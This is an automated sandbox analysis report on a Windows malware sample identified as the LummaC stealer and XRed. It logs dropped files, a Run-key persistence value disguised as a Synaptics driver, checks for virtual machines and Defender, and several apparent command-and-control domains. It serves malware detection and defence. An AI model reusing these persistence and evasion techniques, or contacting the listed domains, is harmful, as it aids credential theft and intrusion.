                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\svA3fW8.iniJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                              Source: 1.exeStatic file information: File size 1101824 > 1048576
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior

                              Persistence and Installation Behavior

                              barindex
                              Drops PE files to the document folder of the user
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\Desktop\._cache_1.exeJump to dropped file
                              Source: C:\Users\user\Desktop\1.exeFile created: C:\ProgramData\Synaptics\RCX9CB3.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\1.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\1.exeFile created: C:\ProgramData\Synaptics\RCX9CB3.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\1.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\1.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\1.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                              Source: C:\Users\user\Desktop\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7484Thread sleep time: -900000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7284Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: Amcache.hve.14.drBinary or memory string: VMware
                              Source: Amcache.hve.14.drBinary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
                              Source: Amcache.hve.14.drBinary or memory string: VMware Virtual USB Mouse
                              Source: Amcache.hve.14.drBinary or memory string: vmci.syshbin
                              Source: Amcache.hve.14.drBinary or memory string: VMware, Inc.
                              Source: Amcache.hve.14.drBinary or memory string: VMware20,1hbin@
                              Source: Amcache.hve.14.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                              Source: Amcache.hve.14.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.14.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: Amcache.hve.14.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.14.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                              Source: Amcache.hve.14.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                              Source: Amcache.hve.14.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.14.drBinary or memory string: vmci.sys
                              Source: Amcache.hve.14.drBinary or memory string: vmci.syshbin`
                              Source: Amcache.hve.14.drBinary or memory string: \driver\vmci,\driver\pci
                              Source: Amcache.hve.14.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.14.drBinary or memory string: VMware20,1
                              Source: Amcache.hve.14.drBinary or memory string: Microsoft Hyper-V Generation Counter
                              Source: Amcache.hve.14.drBinary or memory string: NECVMWar VMware SATA CD00
                              Source: Amcache.hve.14.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                              Source: Amcache.hve.14.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                              Source: Amcache.hve.14.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                              Source: Amcache.hve.14.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                              Source: Amcache.hve.14.drBinary or memory string: VMware PCI VMCI Bus Device
                              Source: Amcache.hve.14.drBinary or memory string: VMware VMCI Bus Device
                              Source: Amcache.hve.14.drBinary or memory string: VMware Virtual RAM
                              Source: Amcache.hve.14.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                              Source: Amcache.hve.14.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_00522080 LdrInitializeThunk,2_2_00522080

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              LummaC encrypted strings found
                              Source: 1.exe, 00000001.00000003.1314875947.0000000003D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
                              Source: 1.exe, 00000001.00000003.1314875947.0000000003D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
                              Source: 1.exe, 00000001.00000003.1314875947.0000000003D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
                              Source: 1.exe, 00000001.00000003.1314875947.0000000003D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
                              Source: 1.exe, 00000001.00000003.1314875947.0000000003D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
                              Source: 1.exe, 00000001.00000003.1314875947.0000000003D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
                              Source: 1.exe, 00000001.00000003.1314875947.0000000003D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
                              Source: 1.exe, 00000001.00000003.1314875947.0000000003D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
                              Source: 1.exe, 00000001.00000003.1314875947.0000000003D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: twistforcepo.cfd
                              Source: C:\Users\user\Desktop\1.exeProcess created: C:\Users\user\Desktop\._cache_1.exe "C:\Users\user\Desktop\._cache_1.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\1.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Users\user\Desktop\1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                              Source: Amcache.hve.14.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                              Source: Amcache.hve.14.drBinary or memory string: msmpeng.exe
                              Source: Amcache.hve.14.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                              Source: Amcache.hve.14.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                              Source: Amcache.hve.14.drBinary or memory string: MsMpEng.exe

                              Stealing of Sensitive Information

                              barindex
                              Yara detected LummaC Stealer
                              Source: Yara matchFile source: decrypted.binstr, type: MEMORYSTR
                              Yara detected XRed
                              Source: Yara matchFile source: 1.exe, type: SAMPLE
                              Source: Yara matchFile source: 1.0.1.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000003.1381263733.00000000007A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 1.exe PID: 2584, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 2260, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX9CB3.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

                              Remote Access Functionality

                              barindex
                              Yara detected LummaC Stealer
                              Source: Yara matchFile source: decrypted.binstr, type: MEMORYSTR
                              Yara detected XRed
                              Source: Yara matchFile source: 1.exe, type: SAMPLE
                              Source: Yara matchFile source: 1.0.1.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000003.1381263733.00000000007A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 1.exe PID: 2584, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 2260, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX9CB3.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information41
                              Scripting                              		1
                              Replication Through Removable Media                              		1
                              PowerShell                              		41
                              Scripting                              		11
                              Process Injection                              		12
                              Masquerading                              		OS Credential Dumping1
                              Query Registry                              		Remote Services1
                              Screen Capture                              		11
                              Encrypted Channel                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault AccountsScheduled Task/Job1
                              Registry Run Keys / Startup Folder                              		1
                              Registry Run Keys / Startup Folder                              		11
                              Virtualization/Sandbox Evasion                              		LSASS Memory111
                              Security Software Discovery                              		Remote Desktop Protocol1
                              Archive Collected Data                              		3
                              Ingress Tool Transfer                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAt1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		11
                              Process Injection                              		Security Account Manager1
                              Process Discovery                              		SMB/Windows Admin Shares2
                              Clipboard Data                              		3
                              Non-Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                              Extra Window Memory Injection                              		11
                              Deobfuscate/Decode Files or Information                              		NTDS11
                              Virtualization/Sandbox Evasion                              		Distributed Component Object ModelInput Capture34
                              Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                              Obfuscated Files or Information                              		LSA Secrets1
                              Peripheral Device Discovery                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              DLL Side-Loading                              		Cached Domain Credentials3
                              File and Directory Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              Extra Window Memory Injection                              		DCSync12
                              System Information Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
